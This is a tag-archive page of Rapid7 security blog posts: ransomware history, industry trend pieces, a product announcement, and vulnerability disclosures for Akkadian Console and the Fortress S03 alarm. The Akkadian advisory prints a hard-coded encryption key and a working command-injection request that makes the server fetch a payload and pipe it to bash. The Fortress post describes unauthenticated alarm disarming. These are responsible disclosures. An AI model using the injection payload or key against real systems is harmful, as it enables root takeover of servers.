Tag Archives: cybersecurity

The Rise of Disruptive Ransomware Attacks: A Call To Action

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/09/10/the-rise-of-disruptive-ransomware-attacks-a-call-to-action/

The Rise of Disruptive Ransomware Attacks: A Call To Action

Our collective use of and dependence on technology has come quite a long way since 1989. That year, the first documented ransomware attack — the AIDS Trojan — was spread via physical media (5 1⁄4″ floppy disks) delivered by the postal service to individuals subscribed to a mailing list. The malware encrypted filenames (not the contents) and demanded payment ($189 USD) to be sent to a post office box to gain access to codes that would unscramble the directory entries.

That initial ransomware attack — started by an emotionally disturbed AIDS researcher — gave rise to a business model that has evolved since then to become one of the most lucrative and increasingly disruptive cybercriminal enterprises in modern history.

In this post, we’ll:

  • Examine what has enabled this growth
  • See how tactics and targets have morphed over the years
  • Take a hard look at the societal impacts of more recent campaigns
  • Paint an unfortunately bleak picture of where these attacks may be headed if we cannot work together to curtail them

Building the infrastructure of our own demise: Ransomware’s growth enablers

As PCs entered homes and businesses, individuals and organizations increasingly relied on technology for everything from storing albums of family pictures to handling legitimate business processes of all shapes and sizes. They were also becoming progressively more connected to the internet — a domain formerly dominated by academics and researchers. Electronic mail (now email) morphed from a quirky, niche tool to a ubiquitous medium, connecting folks across the globe. The World Wide Web shifted from being a medium solely used for information exchange to the digital home of corporations and a cadre of storefronts.

The capacity and capabilities of cyberspace grew at a frenetic pace and fueled great innovation. The cloud was born, cheaply putting vast compute resources into the hands of anyone with a credit card and reducing the complexity of building internet-enabled services. Today, sitting on the beach in an island resort, we can speak to the digital assistant on our smartphones and issue commands to our home automatons thousands of miles away.

Despite appearances, this evolution and expansion was — for the most part — unplanned and emerged with little thought towards safety and resilience, creating (unseen by most) fragile interconnections and interdependencies.

The concept and exchange mechanisms of currency also changed during this time. Checks in the mail and wire transfers over copper lines have been replaced with digital credit and debit transactions and fiat-less digital currency ledger updates.

So, we now have blazing fast network access from even the most remote locations, globally distributed, cheap, massive compute resources, and baked-in dependence on connected technology in virtually every area of modern life, coupled with instantaneous (and increasingly anonymous) capital exchange. Most of this infrastructure — and nearly all the processes and exchanges that run on it — are unprotected or woefully under protected, making it the perfect target for bold, brazen, and clever criminal enterprises.

From pictures to pipelines: Ransomware’s evolving targets and tactics

At their core, financially motivated cybercriminals are entrepreneurs who understand that their business models must be diverse and need to evolve with the changing digital landscape. Ransomware is only one of many business models, and it’s taken a somewhat twisty path to where we are today.

Attacks in the very early 2000s were highly regional (mostly Eastern Europe) and used existing virus/trojan distribution mechanisms that randomly targeted businesses via attachments spread by broad stroke spam campaigns. Unlike their traditional virus counterparts, these ransomware pioneers sought small, direct payouts in e-gold, one of the first widely accessible digital currency exchanges.

By the mid-2000s, e-gold was embroiled in legal disputes and was, for the most part, defunct. Instead of assuaging attackers, even more groups tried their hands at the ransomware scheme, since it had a solid track record of ensuring at least some percentage of payouts.

Many groups shifted attacks towards individuals, encrypting anything from pictures of grandkids to term papers. Instead of currency, these criminals forced victims to procure medications from online pharmacies and hand over account credentials so the attackers could route delivery to their drop boxes.

Others took advantage of the fear of exposure and locked up the computer itself (rather than encrypt files or drives), displaying explicit images that could be dismissed after texting or calling a “premium-rate” number for a code.

However, there were those who still sought the refuge of other fledgling digital currency markets, such as Liberty Reserve, and migrated the payout portion of encryption-based campaigns to those exchanges.

By the early 2010s — due, in part, to the mainstreaming of Bitcoin and other digital currencies/exchanges, combined with the absolute reliance of virtually all business processes on technology — these initial, experimental business models coalesced into a form we should all recognize today:

  • Gain initial access to a potential victim business. This can be via phishing, but it’s increasingly performed via compromising internet-facing gateways or using legitimate credentials to log onto VPNs — like the attack on Colonial Pipeline — and other remote access portals. The attacks shifted focus to businesses for higher payouts and also a higher likelihood of receiving a payout.
  • Encrypt critical files on multiple critical systems. Attackers developed highly capable, customized utilities for performing encryption quickly across a wide array of file types. They also had a library of successful, battle-tested techniques for moving laterally throughout an organization. Criminals also know the backup and recovery processes at most organizations are lacking.
  • Demanding digital currency payout in a given timeframe. Introducing a temporal component places added pressure on the organization to pay or potentially lose files forever.

The technology and business processes to support this new model became sophisticated and commonplace enough to cause an entire new ransomware as a service criminal industry to emerge, enabling almost anyone with a computer to become an aspiring ransomware mogul.

On the cusp of 2020 a visible trend started to emerge where victim organizations declined to pay ransom demands. Not wanting to lose a very profitable revenue source, attackers added some new techniques into the mix:

  • Identify and exfiltrate high-value files and data before encrypting them. Frankly, it’s odd more attackers did not do this before the payment downturn (though, some likely did). By spending a bit more time identifying this prized data, attackers could then use it as part of their overall scheme.
  • Threaten to leak the data publicly or to the individuals/organizations identified in the data. It should come as no surprise that most ransomware attacks go unreported to the authorities and unseen by the media. No organization wants the reputation hit associated with an attack of this type, and adding exposure to the mix helped return payouts to near previous levels.

The high-stakes gambit of disruptive attacks: Risky business with significant collateral damage

Not all ransomware attacks go unseen, but even the ones that gained some attention rarely make it to mainstream national news. In the U.S. alone, hundreds of schools and municipalities have experienced disruptive and costly ransomware attacks each year going back as far as 2016.

Municipal ransomware attacks

When a town or city is taken down by a ransomware attack, critical safety services such as police and first responders can be taken offline for days. Businesses and citizens cannot make payments on time-critical bills. Workers, many of whom exist paycheck-to-paycheck, cannot be paid. Even when a city like Atlanta refuses to reward criminals with a payment, it can still cost taxpayers millions of dollars and many, many months to have systems recovered to their previous working state.

School-district ransomware attacks

Similarly, when a school district is impacted, schools — which increasingly rely on technology and internet access in the classroom — may not be able to function, forcing parents to scramble for child care or lose time from work. As schools were forced online during the pandemic, disruptive ransomware attacks also made remote, online classes inaccessible, exacerbating an already stressful learning environment.

Hobbled learning is not the only potential outcome as well. Recently, one of the larger districts in the U.S. fell victim to a $547,000 USD ransom attack, which was ultimately paid to stop sensitive student and personnel data from becoming public. The downstream identity theft and other impacts of such a leak are almost impossible to calculate.

Healthcare ransomware attacks

Hundreds of healthcare organizations across the U.S. have also suffered annual ransomware attacks over the same period. When the systems, networks, and data in a hospital are frozen, personnel must revert to back up “pen-and-paper” processes, which are far less efficient than their digital counterparts. Healthcare emergency communications are also increasing digital, and a technology blackout can force critical care facilities into “divert” mode, meaning that incoming ambulances with crisis care patients will have to go miles out of their way to other facilities and increase the chances of severe negative outcomes for those patients — especially when coupled with pandemic-related outbreak surges.

The U.K. National Health Service was severely impacted by the WannaCry ransom-“worm” gone awry back in 2017. In total, “1% of NHS activity was directly affected by the WannaCry attack. 80 out of 236 hospital trusts across England [had] services impacted even if the organisation was not infected by the virus (for instance, they took their email offline to reduce the risk of infection); [and,] 595 out of 7,4545 GP practices (8%) and eight other NHS and related organisations were infected,” according to the NHS’s report.

An attack on Scripps Health in the U.S. in 2021 disrupted operations across the entire network for over a month and has — to date — cost the organization over $100M USD, plus impacted emergency and elective care for thousands of individuals.

An even more deliberate massive attack against Ireland’s healthcare network is expected to ultimately cost taxpayers over $600M USD, with recovery efforts still underway months after the attack, despite attackers providing the decryption keys free of charge.

Transportation ransomware attacks

San Francisco, Massachusetts, Colorado, Montreal, the UK, and scores of other public and commercial transportation systems across the globe have been targets of ransomware attacks. In many instances, systems are locked up sufficiently to prevent passengers from getting to destinations such as work, school, or medical care. Locking up freight transportation means critical goods cannot be delivered on time.

Critical infrastructure ransomware attacks

U.S. citizens came face-to-face with the impacts of large-scale ransomware attacks in 2021 as attackers disrupted access to fuel and impacted the food supply chain, causing shortages, panic buying, and severe price spikes in each industry.

Water systems and other utilities across the U.S. have also fallen victim to ransomware attacks in recent years, exposing deficiencies in the cyber defenses in these sectors.

Service provider ransomware attacks

Finally, one of the most high-profile ransomware attacks of all time has been the Kaseya attack. Ultimately, over 1,500 organizations — everything from regional retail and grocery chains to schools, governments, and businesses — were taken offline for over a week due to attackers compromising a software component used by hundreds of managed service providers. Revenue was lost, parents scrambled for last-minute care, and other processes were slowed or completely stopped. If the attackers had been just a tad more methodical, patient, and competent, this mass ransomware attack could have been even more far-reaching and even more devastating than it already was.

The road ahead: Ransomware will get worse until we get better

The first section of this post showed how we created the infrastructure of our own ransomware demise. Technology has advanced and been adopted faster than our ability to ensure the safety and resilience of the processes that sit on top of it. When one of the largest distributors of our commercial fuel supply still supports simple credential access for remote access, it is clear we have all not done enough — up to now — to inform, educate, and support critical infrastructure security, let alone those of schools, hospitals, municipalities, and businesses in general.

As ransomware attacks continue to escalate and become broader in reach and scope, we will also continue to see increasing societal collateral damage.

Now is the time for action. Thankfully, we have a framework for just such action! Rapid7 was part of a multi-stakeholder task force charged with coming up with a framework to combat ransomware. As we work toward supporting each of the efforts detailed in the report, we encourage all other organizations and especially all governments to dedicate time and resources towards doing the same. We must work together to stem the tide, change the attacker economics, and reduce the impacts of ransomware on society as a whole.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)

Over the course of routine security research, Rapid7 researchers Jonathan Peterson, Cale Black, William Vu, and Adam Cammack discovered that the Akkadian Console (often referred to as “ACO”) version 4.7, a call manager solution, is affected by two vulnerabilities. The first, CVE-2021-35468, allows root system command execution with a single authenticated POST request, and CVE-2021-35467 allows for the decryption of data encrypted by the application, which results in the arbitrary creation of sessions and the uncovering of any other sensitive data stored within the application. Combined, an unauthenticated attacker could gain remote, root privileges to a vulnerable instance of Akkadian Console Server.

CVE Identifier CWE Identifier Base CVSS score (Severity) Remediation
CVE-2021-35467 Title CWE-321: Use of Hard-Coded Cryptographic Key Fixed in Version 4.9
CVE-2021-35468 Text CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) Fixed in Version 4.9

Product Description

Akkadian Console (ACO) is a call management system allowing users to handle incoming calls with a centralized management web portal. More information is available at the vendor site for ACO.

Credit

These issues were discovered by Jonathan Peterson (@deadjakk), Cale Black, William Vu, and Adam Cammack, all of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The following were observed and tested on the Linux build of the Akkadian Console Server, version 4.7.0 (build 1f7ad4b) (date of creation: Feb 2 2021 per naming convention).

CVE-2021-35467: Akkadian Console Server Hard-Coded Encryption Key

Using DnSpy to decompile the bytecode of ‘acoserver.dll’ on the Akkadian Console virtual appliance, Rapid7 researchers identified that the Akkadian Console was using a static encryption key, “0c8584b9-020b-4db4-9247-22dd329d53d7”, for encryption and decryption of sensitive data. Specifically, researchers observed at least the following data encrypted using this hardcoded string:

  • User sessions (the most critical of the set, as outlined below)
  • FTP Passwords
  • LDAP credentials
  • SMTP credentials
  • Miscellaneous service credentials

The string constant that is used to encrypt/decrypt this data is hard-coded into the ‘primary’ C# library. So anyone that knows the string, or can learn the string by interrogating a shipping version of  ‘acoserver.dll’ of the server, is able to decrypt and recover these values.

In addition to being able to recover the saved credentials of various services, Rapid7 researchers were able to write encrypted user sessions for the Akkadian Console management portal with arbitrary data, granting access to administrative functionality of the application.

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)
The hardcoded key as shown in the decompiled code of the ACO server

The TokenService of acoserver.dll uses a hardcoded string to encrypt and decrypt user session information, as well as other data in the application that uses the ‘Encrypt’ method.

As shown in the function below, the application makes use of an ECB cipher, as well as PKCS7 padding to decrypt (and encrypt) this sensitive data.

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)
Decrypt function present in acoserver.dll viewed with DnSpy

The image below shows an encrypted and decrypted version of an ‘Authorization’ header displaying possible variables available for manipulation. Using a short python script, one is able to create a session token with arbitrary values and then use it to connect to the Akkadian web console as an authenticated user.

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)
Successfully decrypted a session generated by the application

Using the decrypted values of a session token, a ‘custom’ token can be created, substituting whatever values we want with a recent timestamp to successfully authenticate to the web portal.

The figure below shows this technique being used to issue a request to a restricted web endpoint that responds with the encrypted passwords of the user account. Since the same password is used to encrypt most things in the application (sessions, saved passwords for FTP, backups, LDAP, etc.), we can decrypt the encrypted passwords sent back in the response by certain portions of the application:

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)
Using the same private key to decrypt the encrypted admin password returned by the application

This vulnerability can be used with the next vulnerability, CVE-2021-35468, to achieve remote command execution.

CVE-2021-35468: Akkadian Console Server OS Command Injection

The Akkadian Console application provides SSL certificate generation. See the corresponding web form in the screenshot below:

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)
The web functionality associated with the vulnerable endpoint

The way the application generates these certificates is by issuing a system command using  ‘/bin/bash’ to run an unsanitized ‘openssl’ command constructed from the parameters of the user’s request.

The screenshot below shows this portion of the code as it exists within the decompiled ‘acoserver.dll’.

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)
Vulnerable method as seen from DnSpy

Side Note: In newer versions (likely 4.7+), this “Authorization” header is actually validated. In older versions of the Akkadian Console, this API endpoint does not appear to actually enforce authorization and instead only checks for the presence of the “Authorization” header. Therefore in these older, affected versions, this endpoint and the related vulnerability could be accessed directly without the crafting of the header using CVE-2021-35467. Exact affected versions have not been researched.

The below curl command will cause the Akkadian Console server to itself run its own curl command (in the Organization field) and pipe the results to bash.

curl -i -s -k -X $'POST' \
   -H $'Host: 192.168.200.216' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0' -H $'Authorization: <OMITTED>' -H $'Content-Type: application/json' -H $'Content-Length: 231' \
   --data-binary $'{\"AlternativeNames\": [\"assdf.com\", \"asdf.com\"], \"CommonName\": \"mydomano.com\", \"Country\": \"US\", \"State\": \";;;;;`\", \"City\": \";;;``;;`\", \"Organization\": \";;;`curl 192.168.200.1/payload|bash`;;`\", \"OrganizationUnit\": \";;\", \"Email\": \"\"}' \
   $'https://192.168.200.216/api/acoweb/generateCertificate'

Once this is received by ACO, the named curl payload is executed, and a shell is spawned, but any operating system command can be executed.

Impact

CVE-2021-35467, by itself, can be exploited to allow an unauthenticated user administrative access to the application. Given that this device supports LDAP-related functionality, an attacker could then leverage this access to pivot to other assets in the organization via Active Directory via stored LDAP accounts.

CVE-2021-35468 could allow any authenticated user to execute operating system level commands with root privileges.

By combining CVE-2021-35467 and CVE-2021-35468, an unauthenticated user can first establish themselves as an authenticated user by crafting an arbitrary session, then execute commands on ACO’s host operating system as root. From there, the attacker can install any malicious software of their choice on the affected device.

Remediation

Users of Akkadian Console should update to 4.9, which has addressed these issues. In the absence of an upgrade, users of Akkadian Console version 4.7 or older should only expose the web interface to trusted networks — notably, not the internet.

Disclosure Timeline

  • April, 2021: Discovery by Jonathan Peterson and friends at Rapid7
  • Wed, Jun 16, 2021: Initial disclosure to the vendor
  • Wed, Jun 23, 2021: Updated details disclosed to the vendor
  • Tue, Jul 13, 2021: Vendor indicated that version 4.9 fixed the issues
  • Tue, Aug 3, 2021: Vendor provided a link to release notes for 4.9
  • Tue, Sep 7, 2021: Disclosure published

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

SANS Experts: 4 Emerging Enterprise Attack Techniques

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/09/02/sans-experts-4-emerging-enterprise-attack-techniques/

SANS Experts: 4 Emerging Enterprise Attack Techniques

In a recent report, a panel of SANS Institute experts broke down key takeaways and emerging attack techniques from this year’s RSA Security Conference. The long and short of it? This next wave of malicious methodologies isn’t on the horizon — it’s here.

When it comes to supply-chain and ransomware attacks, bad actors seem to have migrated to new ground over the last 2 years. The SANS Institute report found that government, healthcare, and retail (thanks in large part to online spending at the height of the pandemic) were the sectors showing the largest spike from the first quarter of 2020 to this year, in terms of finding themselves in attackers’ crosshairs. As larger incidents increase in frequency, let’s take a look at 4 specific attack formats trending toward the norm and how you can stay ahead of them.

1. Cracks in the facade of software integrity

Developers are under greater pressure to prioritize security (i.e., shift left) within the Continuous Integration/Continuous Delivery (CI/CD) lifecycle. This would seem to be at stark odds with the number of applications built on open-source software (OSS). And, if a security organization is part of a supply chain, how many pieces of OSS are being used at one time along that chain? The potential is huge for an exponential jump in the number of vulnerabilities in that group of interdependent organizations.

There are ways to mitigate these seemingly unstoppable threats. Measures like file integrity monitoring (FIM) surface changes to critical files on your network, alerting you to suspicious activity while also providing context as to the affected users and/or assets. Threat hunting can also help to expose vulnerabilities.

Used with a cloud-native, extended-detection-and-response (XDR) approach, Rapid7’s proactive threat-hunting capabilities leverage multiple security and telemetry sources to act on fine-grained insights and empower teams to quickly take down threats.

2. Do you have a token to get into that session?

Commonly, applications make use of tokens to identify a person wishing to access secure data, like banking information. A user’s mobile app will exchange the token with a server somewhere to verify that, indeed, this is the actual user requesting the information and not an attacker. Improper session handling happens when the protocols according to which these applications are working don’t properly secure identifying tokens.

The issue of improper user authentication was exacerbated by the onslaught of the pandemic, as companies raced to secure — or not — enterprise software for a quickly scaled-up remote workforce. To resolve this issue, individual users can simply make it a best practice to always hit that little “log off/out” button once they’re finished. Businesses can also do this by setting tokens to automatically expire after a predetermined length of time.  

At the enterprise level, security organizations can use a comprehensive application-testing strategy to monitor for weak session handling and nefarious attacker actions like:

  • Guessing a valid session token after only short-term monitoring
  • Using static tokens to target users, even if they’re not logged in
  • Leveraging a token to delete user data without knowing the username/password

3. Turning the machines against us

No, that’s not a Terminator reference. If someone has built out a machine-learning (ML) algorithm correctly, it should do nothing but assist an organization in accomplishing its business goals. When it comes to security, this means being able to recognize traffic patterns that are relatively unknown and classifying them according to threat level.

However, attackers are increasingly able to corrupt ML algorithms and trick them into labeling malicious traffic as safe. Another sophisticated method is for attackers to purchase their own ML products and use them as training grounds to produce and deploy malware. InsightIDR from Rapid7 leverages user-behavior analytics (UBA) to stay ahead of malicious actions against ML algorithms.

Understanding how your ML product functions is key; it should build a baseline of normal user behavior across the network, then match new actions against data gleaned from a combination of machine learning and statistical algorithms. In this way, UBA exposes threats without relying on prior identification in the wild.

4. Ramping up ransomware

Let’s face it: Attackers all over the world are essentially creating repositories and educational platforms in how to evolve and deploy ransomware. It takes sophistication, but ransomware packages are now available more widely to the non-tech set to, for lack of a more apt phrase, plug and play.

As attack methodologies ramp up in frequency and size, it’s not just data at risk anymore. Bad actors are threatening companies with wide public exposure and potentially a catastrophic loss to reputation. But there are opportunities to learn offensive strategies, as well as how attacker techniques can become signals for detection.

Target shifts

If the data in the SANS report tells us anything, it’s that attackers and their evolving methodologies — like those mentioned above — are constantly searching not just for bigger targets and paydays, but also easier paths to their goals.

Targeted industry shifts in year-over-year data show that the company or sector you’re in clearly makes no difference. Perhaps the biggest factor in bad actors’ strategies is the degree of ease with which they get what they want — and some industries still fall woefully behind when it comes to security and attack readiness.

Learn more about the latest threat trends

Read the full SANS report

New Rapid7 MDR Essentials Capability Sees What Attackers See: “It’s Eye-Opening”

Post Syndicated from Jake Godgart original https://blog.rapid7.com/2021/09/01/new-rapid7-mdr-capability-sees-what-attackers-see-its-eye-opening/

New Rapid7 MDR Essentials Capability Sees What Attackers See: “It’s Eye-Opening”

The pandemic and remote work shattered your perimeter. Your attack surface has changed — and will keep changing.

It’s our mission to help customers strengthen security defenses and stay ahead of evil. As the modern perimeter expands, new (and old) vulnerabilities emerge as open doors for attackers; some can be exploited, and that leads to attacks.

The fact is, most successful attacks are caused by unpatched vulnerabilities, and most can be traced back to human error. So one answer to reducing risk is to patch the vulnerabilities you find with a simple external scan.

Rapid7 has been at the forefront of vulnerability risk management for 20 years — from the days where on-premise Nexpose scanners ruled, to our cloud-based InsightVM solution, to our Managed Vulnerability Management service.

Now, we’re adding a new capability (and report) to connect proactive and reactive security for our MDR Essentials customers. We call it Attack Surface Visibility.

Introducing Attack Surface Visibility

Our goal with Attack Surface Visibility — built exclusively for our MDR Essentials customers — is to help proactively plug the holes that attackers may exploit and, in turn, reduce the number of low-hanging incidents that could be avoided.

The Attack Surface Visibility report breaks down risks in your environment based on Rapid7’s granular Real Risk score. It looks at exploitability, malware exposure, and vulnerability age to give customers the actionable data that prioritizes remediation efforts on the places attackers will focus.

Attack Surface Visibility gives MDR Essentials customers the ability to:

  • See a monthly snapshot of how your exposed attack surface looks to an opportunistic attacker
  • Gain visibility into the top externally facing vulnerabilities that attackers can easily exploit
  • Stay ahead of risks as your attack surface changes
  • Optimize your team’s efforts with clear, prioritized actions to remediate risks and improve your security posture
  • Reduce the amount of alerts, MDR investigations, and incidents in your environment by being more proactive with your externally facing remediation efforts
  • Collaborate with your Security Advisor to determine prioritization and patching priority

While it does not replace the need for a true vulnerability management program, Attack Surface Visibility offers your team a better level of awareness to detect obvious weak points that attackers may exploit. Even customers running programs with InsightVM — our industry-leading vulnerability risk management solution backed by Gartner and Forrester — are able to see value.

Attack Surface Visibility in action

The first time we spun up the scan engine and sent the new report out to a customer, they saw instant value. The scan found almost 20 different remediations needed across their assets scanned, including a few highly concerning risks their MDR Security Advisor prioritized as the first ones to remediate:

  • Remove/disable SMBv1 For those who were in cybersecurity during 2017, I’m sure this is triggering some shell shock from the days of EternalBlue and WannaCry. Let’s be honest: SMB1 was designed for a world that existed almost 40 years ago and doesn’t belong in 2021. Even the guy who owns SMB at Microsoft urges everyone to stop using it. The fact is, with malware kits available in Metasploit, anyone who knows what they’re doing can launch an attack to exploit it. This one’s a big risk, but a quick fix.
  • Configure SMB signing for Windows Attackers have it easy when SMB is exposed externally. Most attacks stemming from this arise from attackers leveraging credential stuffing (password reuse) on external-facing assets as their primary method of entry.  Since this organization is in the process of implementing 2FA, this was another focus for immediate remediation efforts.
  • Disable insecure TLS/SSL protocol support As time marches on, cryptography standards evolve to meet the needs of an ever-more secure internet. However, the long shadow of legacy clients tends to mean that, by default, older and insecure cryptographic protocols remain enabled. These defaults tend to open up an attack surface that is otherwise mitigated by running modern cryptography suites. Specifically, organizations need to be aware of the risks posed by exposing older algorithms to attacks such as BEAST,  POODLE, and Lucky Thirteen.

In the customer’s words, this was “eye-opening.”

You can see what a sample version of the report looks like here.

For our existing MDR Essentials customers

Good news! We will be rolling out your first Attack Surface Visibility reports starting in Q4. Your Customer Advisor will reach out to you soon to capture external IP addresses in order to begin the scanning process.

We look forward to helping you continue to build more confidence with your security program!

To our future customers

Rapid7 MDR has service offerings available for customers of any size, security maturity, or industry. Whether you’re looking for your first MDR provider or making an upgrade, we have a service that fits your goals.

Interested in learning about Rapid7 MDR? Let’s connect you with an expert.

CVE-2021-3927[67]: Fortress S03 WiFi Home Security System Vulnerabilities

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/08/31/cve-2021-3927-67-fortress-s03-wifi-home-security-system-vulnerabilities/

CVE-2021-3927[67]: Fortress S03 WiFi Home Security System Vulnerabilities

Rapid7 researcher Arvind Vishwakarma discovered multiple vulnerabilities in the Fortress S03 WiFi Home Security System. These vulnerabilities could result in unauthorized access to control or modify system behavior, and access to unencrypted information in storage or in transit. CVE-2021-39276 describes an instance of CWE-287; specifically, it describes an insecure cloud API deployment which allows unauthenticated users to trivially learn a secret that can then be used to alter the system’s functionality remotely. It has an initial CVSS score of 5.3 (medium). CVE-2021-39277 describes an instance of CWE-294, a vulnerability where anyone within Radio Frequency (RF) signal range could capture and replay RF signals to alter systems behavior, and has an initial CVSS score of 5.7.

Product Description

The Fortress S03 WiFi Home Security System is a do it yourself (DIY) consumer grade home security system which leverages WiFi and RF communication to monitor doors, windows, and motion detection to spot possible intruders. Fortress can also electronically monitor the system for you, for a monthly fee. More information about the product can be found at the vendor’s website.

Credit

These issues were discovered by Rapid7 researcher Arvind Vishwakarma and are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

What follows are details regarding the two disclosed vulnerabilities. Generally speaking, these issues are trivially easy to exploit by motivated attackers who already have some knowledge of the target.

CVE-2021-39276: Unauthenticated API Access

If a malicious actor knows a user’s email address, they can use it to query the cloud-based API to return an International Mobile Equipment Identity (IMEI) number, which appears to also serve as the device’s serial number. The following post request structure is used to make this unauthenticated query and return the IMEI:

CVE-2021-3927[67]: Fortress S03 WiFi Home Security System Vulnerabilities

With a device IMEI number and the user’s email address, it is then possible for a malicious actor to make changes to the system, including disarming its alarm. To disarm the system, the following unauthenticated POST can be sent to the API:

CVE-2021-3927[67]: Fortress S03 WiFi Home Security System Vulnerabilities

CVE-2021-39277: Vulnerable to RF Signal Replay Attack

The system under test was discovered to be vulnerable to an RF replay attack. When a radio-controlled device has not properly implemented encryption or rotating key protections, this can allow an attacker to capture command-and-control signals over the air and then replay those radio signals in order to perform a function on an associated device.

As a test example, the RF signals used to communicate between the Key Fobs, Door/Window Contact Sensors, and the Fortress Console were identified in the 433 MHz band. Using a software defined radio (SDR) device, the researcher was able to capture normal operations of the device “arm” and “disarm” commands. Then, replaying the captured RF signal communication command would arm and disarm the system without further user interaction.

CVE-2021-3927[67]: Fortress S03 WiFi Home Security System Vulnerabilities

Impact

For CVE-2021-39276, an attacker can use a Fortress S03 user’s email address to easily disarm the installed home alarm without the user’s knowledge. While this is not usually much of a concern for random, opportunistic home invaders, this is particularly concerning when the attacker already knows the victim well, such as an ex-spouse or other estranged relationship partner.

CVE-2021-39277 presents similar problems but requires less prior knowledge of the victim, as the attacker can simply stake out the property and wait for the victim to use the RF-controlled devices within radio range. The attacker can then replay the “disarm” command later, without the victim’s knowledge.

Mitigations

In the absence of a patch or update, to work around the IMEI number exposure described in CVE-2021-39276, users could configure their alarm systems with a unique, one-time email address. Many email systems allow for “plus tagging” an email address. For example, a user could register “[email protected]” and treat that plus-tagged email address as a stand-in for a password.

For CVE-2021-39277, there seems to be very little a user can do to mitigate the effects of the RF replay issues, absent a firmware update to enforce cryptographic controls on RF signals. Users concerned about this exposure should avoid using key fobs and other RF devices linked to their home security systems.

Disclosure Timeline

  • May, 2021: Issues discovered by Arvind Vishwakarma of Rapid7
  • Thu, May 13, 2021: Initial contact to Fortress support email
  • Thu, May 13, 2021: Ticket #200781 created
  • Mon, May 24, 2021: Ticket #200781 closed by Fortress
  • Wed, Aug 18, 2021: Rapid7 created a follow up ticket, #203001, with vulnerability details and a reiteration of intent to publish
  • Tue, Aug 31, 2021: Published disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[The Lost Bots] Episode 4: Deception Technology

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/30/the-lost-bots-episode-4-deception-technology/

[The Lost Bots] Episode 4: Deception Technology

Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. This episode is a little different, as it’s Jeffrey talking one-on-one with you about one of his favorite subjects: deception technology! Watch below to learn about the history, special characteristics, goals, and possible roadblocks (with counterpoints!) of what he likes to call “HoneyThings,” and also learn practical advice about the application of this amazing technology.



[The Lost Bots] Episode 4: Deception Technology

Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles insider threats where the threat is definitely inside your organization, but maybe not in the way you think.

The Cybersecurity Skills Gap Is Widening: New Study

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/08/27/the-cybersecurity-skills-gap-is-widening-new-study/

The Cybersecurity Skills Gap Is Widening: New Study

The era of COVID-19 has taught us all a few things about supply and demand. From the early days of toilet paper shortages to more recent used-car pricing shocks, the stress tests brought on by a global pandemic have revealed the extremely delicate balance of scarcity and surplus.

Another area seeing dramatic shortages? Cybersecurity skills. And just like those early lockdown days when we were frantically scouring picked-over supermarket shelves for the last pack of double-ply, it seems like security resources are growing scarcer just when we need them most.

A new study from the Information Systems Security Association (ISSA) reveals organizations are having serious trouble sourcing top-tier cybersecurity talent — despite their need to fill these roles growing more urgent by the day.

Mind the gap

The ISSA study paints a clear picture: Infosec teams are all too aware of the gap between the skills they need and resources they have on hand. Of the nearly 500 cybersecurity professionals surveyed in the study, a whopping 95% said the skills shortage in their field hasn’t improved in recent years.

Meanwhile, of course, cyber attacks have only grown more frequent in the era of COVID-19. And if more attacks are occurring while the skills shortage isn’t improving, there’s only one conclusion to make: The lack of cybersecurity know-how is getting worse, not better.

But despite almost universal acknowledgement of the problem, most organizations simply aren’t taking action to solve it. In fact, 59% of respondents to the ISSA study said their organizations could be doing more to address the lack of cybersecurity skills.

Room for improvement

Given the fact that the skills gap is so top-of-mind and widely felt across the industry, what factors are contributing to the lack of improvement on the issue? ISSA’s findings highlight some key areas where organizations are falling behind.

  • Getting talent in the door — For most organizations, finding the right people for the job is the root of the problem: 76% of respondents said hiring cybersecurity specialists is extremely or somewhat difficult.
  • Putting skin in the game — The top cause that ISSA survey respondents cited for their trouble attracting talent was compensation, with 38% reporting their organizations simply don’t offer enough pay to lure in cybersecurity experts.
  • Investing in long-term training — More than 4 out of 5 security pros surveyed said they have trouble finding time to keep their skills sharp and up-to-date while keeping up with the responsibilities of their current roles. Not surprisingly, increased investment in training was the No. 1 action respondents said their organizations should take to close the skills gap.
  • Alignment between business and security — Nearly a third of respondents said HR and cybersecurity teams aren’t on the same page when it comes to hiring priorities, and 28% said security pros and line-of-business leaders need to have stronger relationships.

For the ISSA researchers, the first step in addressing these shortcomings is a change in mindset, from thinking of security as a peripheral function to one that’s at the core of the business.

“There is a lack of understanding between the cyber professional side and the business side of organizations that is exacerbating the cyber-skills gap problem,” ISSA’s Board President Candy Alexander points out. She goes on to say, “Both sides need to re-evaluate the cybersecurity efforts to align with the organization’s business goals to provide the value that a strong cybersecurity program brings towards achieving the goals of keeping the business running.”

Time to catch up

The pace of innovation today is higher than ever before, as businesses roll out more and more new tech in an effort to create the best customer experiences and stay on the cutting edge of competition. But as this influx of tech hits the scene — from highly accessible cloud-based applications to IoT-connected devices — the number of risks these tools introduce to our lives and our business activities also grows. Meanwhile, attackers are only getting smarter, adjusting their techniques to the technologies that innovation-led businesses are bringing to market.

